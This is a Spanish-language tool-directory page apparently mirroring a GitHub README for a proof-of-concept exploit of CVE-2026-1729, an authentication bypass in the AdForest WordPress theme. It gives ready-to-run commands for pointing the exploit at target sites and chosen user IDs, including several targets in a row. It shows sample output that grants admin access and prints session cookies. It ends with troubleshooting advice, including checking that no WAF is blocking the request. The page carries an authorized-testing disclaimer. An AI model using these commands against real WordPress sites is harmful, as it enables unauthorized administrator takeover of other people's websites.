Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass — El tema AdForest para WordPress es vulnerable a la omisión de autenticación en todas las versiones, incluida la 6.0.12. Esto se debe a que el complemento no verifica correctamente la identidad de un usuario antes de autenticarlo mediante la función 'sb_login_user_with_otp_fun'. Esto hace posible que atacantes no autenticados inicien sesión, incluido el administrador. | Kitploit
Herramientas/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
hace 6 mesesAún no revisado

Acerca de

El tema AdForest para WordPress es vulnerable a la omisión de autenticación en todas las versiones, incluida la 6.0.12. Esto se debe a que el complemento no verifica correctamente la identidad de un usuario antes de autenticarlo mediante la función 'sb_login_user_with_otp_fun'. Esto hace posible que atacantes no autenticados inicien sesión, incluido el administrador.

Compartir

CVE-2026-1729 - Bypass de autenticación de AdForest WordPress PoC

Descripción

Prueba de concepto simple para CVE-2026-1729 (PoC) - Vulnerabilidad de bypass de autenticación en el tema AdForest de WordPress. Escrito por f3ds cr3w est 2oo2 blog

Características

  • ✅ Acceso directo de administrador sin credenciales
  • ✅ Funciona en instancias de WordPress en producción
  • ✅ No requiere configuración de Docker
  • ✅ Interfaz de línea de comandos simple
  • ✅ Persistencia de sesión

Requisitos

  • Python 3.6+
  • Biblioteca requests

Instalación

root@kitploit:~
pip install requests

Uso

Uso básico

root@kitploit:~
python poc/exploit.py https://target-site.com

Apuntar a una ID de usuario específica

root@kitploit:~
python poc/exploit.py https://target-site.com --user-id 2

Ejemplos

root@kitploit:~
# Explotar el admin predeterminado (ID de usuario 1)
python poc/exploit.py https://example.com

# Explotar una cuenta de usuario específica
python poc/exploit.py https://example.com --user-id 5

# Probar múltiples objetivos
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

Salida

root@kitploit:~
CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin

🎯 Exploit completed successfully!
You now have admin access to the WordPress site.

Qué sucede después del exploit

  1. Acceso de administrador: Obtienes acceso completo de administrador a /wp-admin/
  2. Persistencia de sesión: El exploit mantiene las cookies de sesión
  3. Información del usuario: Muestra qué cuenta has comprometido
  4. Acceso directo: Puedes acceder inmediatamente al panel de administración de WordPress

Notas

  • Uso legal: Usa esto solo en sitios que te pertenezcan o sobre los que tengas permiso explícito para realizar pruebas
  • Requisitos del objetivo: El sitio debe tener instalado el tema AdForest
  • Tasa de éxito: Funciona en versiones vulnerables del tema AdForest
  • Sin instalación: No es necesario instalar nada en el servidor objetivo

Solución de problemas

Si el exploit falla:

  1. Verifica que el tema AdForest esté instalado
  2. Comprueba si el sitio ejecuta WordPress
  3. Asegúrate de que la versión del tema sea vulnerable
  4. Asegúrate de que ningún WAF o plugin de seguridad esté bloqueando la solicitud
Descargar herramienta